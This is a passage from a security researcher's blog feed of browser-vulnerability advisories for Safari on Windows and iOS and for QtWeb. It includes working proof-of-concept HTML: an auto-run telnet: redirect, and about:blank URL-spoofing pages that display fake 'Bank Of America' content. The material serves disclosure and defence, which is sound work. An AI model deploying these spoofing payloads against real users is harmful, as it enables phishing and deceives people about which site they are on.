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'/><h1></b>Hello !! i'm a Spoofed Site !!!</b></h1></body>");<br />
}<br />
</script><br />
</head><br />
<body onload="invokePoC()"><br />
<h1>Safari for windows 5.1.5 and prior URL pseudo-spoof window.open() test case.</h1><br />
<noscript><p>this testcase requires JavaScript to run.</p></noscript><br />
<p>First Click in this link ==> <a href="http://www.bankofamerica.com/login" onClick="location.reload();" target="_blank">invoke PoC</a></p><br />
<p>and Look in result window, the address bar , show The url and if you write<br />
any url in the address bar, the browser can't navigate to it. This issue can be<br />
used to spoof sites or pishing attacks. Vulnerable Safari for windows 5.1.5 and<br />
prior versions, also Safari for IOS is Too vulnerable.<br />
</body><br />
</html><br />
####################### €Nd ######################<br />
<br />
--<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-5323521479395191532012-03-23T03:11:00.002-07:002012-04-03T15:32:48.308-07:00Safari for windows and IOS URL weakness<pre>#####################################
Safari for windows and Ios Url Spoof
Vendor URL: http://www.apple.com
Advisore:http://lostmon.blogspot.com/2012/03/safari-for-windows-and-ios-url-weakness.html
Vendor notify: YES PoC available: YES
#####################################
#############
History
#############
Yesterday i read a New about safari for IOS
Url spoof vulnerability at http://iclarified.com/entry/comments.php?enid=20858
I want to clarify that i had report this vulnerabiliy in 12/03/2011 to apple
product security across MSVR. (i had the mails that demostrate it)
So apple Don't patch it and this vuln is one year old.
I had report to a telnet automatic execution in safari for windows...
and <strike>they have patch in silence</strike> ... no credits no info...
THis is the response about telnet execution from apple:
" Issue 1: We do not see any security implications with allowing telnet connections.
There is an existing enhancement request for OS X to provide a warning dialog."
Yes but not in windows and if you doing apps for windows you can't say it does not work in OS X. It works in Safari for windows prior to 5.1.4
Issue 2: URL Spoof
I have found few times a go a RCE in IE 6, 7 and 8 see MS011-57
also it affects to Qtweb browser and safari for windows
i report it to apple and sit quiet and wait till apple patch.
So whats happened?¿ after a year of report he vuln continue working and other
researchers had publish it ( http://majorsecurity.net )
but i like to clarify that i report it to apple one year a go !!!
Response from apple:
"Issue 2: The outside third party you are coordinating with already sent this issue to us on January 10, 2011. It does not appear possible to spoof arbitrary URLs in the address bar (i.e. while the title may say "Bank of America" in the proof-of-concept, you can't spoof the address bar to read https://bankofamerica.com) Given that the most serious impact of this issue is that you can prevent the userfrom using the address bar in the newly created tab, we do not have a timetabletoresolve this issue."
look his PoC / exploit and look my code PoC
His code => http://majorsecurity.net/html5/ios51-demo.html
My code => http://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.html
this is the similar code that i had report to apple.
Bad Words for apple on security !!!!!!!!!!! and bad work with security researchers :/
################
Sample codes
################
############ BOF Safari.html #################
<html><title>Safari unauth telnet execution by lostmon</title>
<script type="text/javascript" language="javascript">
function redirect() {
location.replace("telnet:192.168.1.1");
}
</script>
<body onLoad="redirect();">
</body>
</html>
############### EOF ################
2- URL Spoof or about:blank spoof
This issue can use to spoof url locations or to show fake content in
without any URL in the address bar
- open the PoC and click in Invoke PoC and look at the address bar, it
does not show any url....(safari2.html)
-open the PoC and click in invokePoC (safari3.html) Look at addressbar
it shows "about:blank" but itn't at about:blank.
and look at the page title :) This can use to spoof content.
############## BOF safari2.html #################
<html>
<head>
<title>About:blank Url spoofing using document.open() testcase</title>
<script type="text/javascript"><!--
var wx;
function invokePoC() {
wx = open("","newwin");
setInterval("doit()",1);
}
function doit() {
wx.document.open();
wx.document.write('OWNED OWNED OWNED');
}
// -->
</script>
</head>
<body>
<h1>About:blank Url spoofing using document.open() testcase</h1>
<noscript><p>this testcase requires JavaScript to run.</p></noscript>
<p><a href="javascript:invokePoC();">invoke PoC</a></p>
</body>
</html>
################# EOF ################################
#################### BOF safari3.html ###################
<html>
<head>
<title>About:blank Url spoofing using document.open() testcase</title>
<script type="text/javascript"><!--
var wx;
function invokePoC() {
wx = open("about:blank","newwin");
setInterval("doit()",1);
}
function doit() {
wx.document.open();
wx.document.write('<html><title>Bank Of America</title>OWNED OWNED
OWNED<br></html>');
}
// -->
</script>
</head>
<body>
<h1>About:blank Url spoofing using document.open() testcase</h1>
<noscript><p>this testcase requires JavaScript to run.</p></noscript>
<p><a href="javascript:invokePoC();">invoke PoC</a></p>
</body>
</html>
##################### EOF ##############################
I would like to thnx MSVR for his preocupation on this issue and for talk about it with apple. MSVR is a Very Good program and they do A VERY GOOD WORK on security !!!!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
</pre><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-54194734087003927472011-10-03T03:55:00.001-07:002011-10-03T03:57:09.093-07:00QTWeb Internet Browser URL weakness lets remote attackers to do Spoof or phishing attacks#################################################<br />
QTWeb Internet Browser URL weakness lets remote attackers to do Spoof or phishing attacks<br />
Vendor URL: http://www.qtweb.net/<br />
Vendor bugtrack=> http://code.google.com/p/qtweb/issues/detail?id=151<br />
Advisore: http://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.html<br />
Vendor notify: YES exploit available: YES<br />
##################################################<br />
<br />
###################<br />
Description By vendor<br />
###################<br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
QtWeb Internet Browser - lightweight, secure and portable browser having unique user interface and privacy features. QtWeb is an open source project based on Nokia's Qt framework and Apple's WebKit rendering engine (the same as being used in Apple Safari and Google Chrome).</div>
<br />
######################<br />
Vulnerability Description<br />
######################<br />
<br />
<div style="text-align: left;">
In a normal case when navigate to a site, the browser shows real URL But it has a weakness and a attacker can show a empty URL. This weakness can be used for pishing or spoof attacks because you can think that you are in bank of america for example and the browser don't show nothing in URL:) </div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzJn5s8fe9D715KjGQuOrrEdEPsjapG2JR8PHbKSZf4Ihu-_tJ4OSZC5-xJpMNIvbqHABPlSjUi-zB0qcAo_IFI7iuswYqtJVliyAcdm8rbo7FxIYBoMYlN-FDWnuEenMIxfCN/s1600/qt1.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzJn5s8fe9D715KjGQuOrrEdEPsjapG2JR8PHbKSZf4Ihu-_tJ4OSZC5-xJpMNIvbqHABPlSjUi-zB0qcAo_IFI7iuswYqtJVliyAcdm8rbo7FxIYBoMYlN-FDWnuEenMIxfCN/s400/qt1.jpg" width="400" /></a></td></tr>
